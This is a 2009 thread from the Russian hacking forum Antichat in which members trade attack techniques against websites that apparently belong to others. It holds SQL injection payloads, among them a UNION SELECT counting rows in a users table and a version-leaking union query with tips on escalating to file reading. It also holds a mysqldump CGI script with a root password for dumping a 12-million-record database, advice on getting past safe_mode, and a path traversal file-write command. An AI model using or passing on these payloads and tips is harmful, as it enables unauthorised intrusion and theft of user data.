HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.11.2009, 17:25
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

Емпти сет. Эта табличка пустая

999')+UNION+SELECT+1,count(*),3,4+from+users--+

Кстати рега происходит в булке, а не в этом PhotoPost. Видимо база юзеров хранится там.
 
Ответить с цитированием

  #2  
Старый 21.11.2009, 19:41
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Чем можно сдампить большую БД (12кк записей)
sypex не смог
На сервере можно запускать cgi скрипты.

Попробовал
PHP код:
#!/bin/sh

DB=forum
USER
=root
PASS
=motynub
HOST
=localhost

echo "Content-Type: text/plain"
echo "Content-Disposition: attachment; filename=$DB.sql"
echo

mysqldump --opt --quick --max_allowed_packet=1M --default-character-set=utf8 -"$USER-p"$PASS-h $HOST $DB 
Но вышел еррор 500 (safe_mode = ON)

Последний раз редактировалось Byrger; 21.11.2009 в 19:57..
 
Ответить с цитированием

  #3  
Старый 22.11.2009, 15:08
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

Цитата:
Сообщение от Byrger  
Чем можно сдампить большую БД (12кк записей)
sypex не смог
На сервере можно запускать cgi скрипты.

Попробовал
PHP код:
#!/bin/sh

DB=forum
USER
=root
PASS
=motynub
HOST
=localhost

echo "Content-Type: text/plain"
echo "Content-Disposition: attachment; filename=$DB.sql"
echo

mysqldump --opt --quick --max_allowed_packet=1M --default-character-set=utf8 -"$USER-p"$PASS-h $HOST $DB 
Но вышел еррор 500 (safe_mode = ON)
Попробуй запустить процесс в фоновом режиме, чтобы php не дожидался его завершения.
Вообще Sypex 2.0 может перезапускать себя для работы при safe_mode=on, проверь может ты старый использовал
 
Ответить с цитированием

  #4  
Старый 20.11.2009, 17:26
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

Цитата:
С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
 
Ответить с цитированием

  #5  
Старый 20.11.2009, 17:40
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
Сообщение от Spyder  
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
я думаю речь идет не про метод PUT, а про фтпшную комманду PUT и суть уязвимости в том, что с помощью ../../ можно выйти из родительского каталога и записать файл ну например в корень серва, если конечно права позволят, это мое предположение и я могу ошибаться
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #6  
Старый 21.11.2009, 08:56
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами: 8799871

Репутация: 19
По умолчанию

Цитата:
Сообщение от Spyder  
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
Ну нету там веб-сервера! Смотри пор и демон,который висит на нём!
 
Ответить с цитированием

  #7  
Старый 21.11.2009, 10:24
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами: 9204308

Репутация: 256
По умолчанию

Цитата:
Сообщение от p.r0phe.t  
Ну нету там веб-сервера! Смотри пор и демон,который висит на нём!
Скорее всего тут прав Scipio и речь идет не про метод PUT, а про эфтипишную комманду
 
Ответить с цитированием

  #8  
Старый 21.11.2009, 11:13
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами: 8799871

Репутация: 19
По умолчанию

Цитата:
Сообщение от DrAssault  
Скорее всего тут прав Scipio и речь идет не про метод PUT, а про эфтипишную комманду
Ну да,скорее всего так и есть.
Но как подключиться к фтп на udp порту и какой синтаксис это команды?
NetCat ничего не выводит,хотя соединение не обрывает.
 
Ответить с цитированием

  #9  
Старый 20.11.2009, 17:55
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами: 10268804

Репутация: 208


По умолчанию

ребята, после изучений нескольких статей, хотел пробовать в деле, и в одном сайте по запросу:
Код:
http://www.site.ru/vn84.php?id=’ OR ’1’=’1’
Выдает такая ошибка:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '™ OR ’1’=’1В’ AND status = '1'' at line 2
на сколько это серьезная ошибка и можно ли раскрутить это дальше ?

а если например перенаправить (http://www.site.ru/vn84.php?id=http://www.ya.ru/) на yandex.ru, то получается такая ошибка:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.ya.ru/ AND status = '1'' at line 2
 
Ответить с цитированием

  #10  
Старый 20.11.2009, 18:06
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

2B1t.exe
Код:
id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,version())+--+
мне кажется там можно замутить инклюд или читалку файлов
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.